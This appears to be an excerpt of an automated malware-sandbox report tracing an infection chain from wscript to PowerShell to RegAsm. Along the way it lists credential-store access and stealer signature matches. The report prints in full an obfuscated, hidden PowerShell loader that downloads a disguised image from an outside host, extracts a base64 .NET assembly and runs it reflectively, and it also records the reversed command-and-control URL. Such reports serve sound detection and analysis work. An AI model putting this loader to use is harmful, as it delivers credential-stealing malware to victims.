                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?xwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?eu? ? ? ? ?tgbe? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?sqbu? ? ? ? ?gq? ? ? ?
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gffrew/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?xwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?eu? ? ? ? ?tgbe? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?sqbu? ? ? ? ?gq? ? ? ?Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gffrew/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                  Source: RegAsm.exe, 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434CB6 cpuid 8_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,8_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,8_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004489D7 GetSystemTimeAsFileTime,8_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B69E GetComputerNameExW,GetUserNameW,8_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db8_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
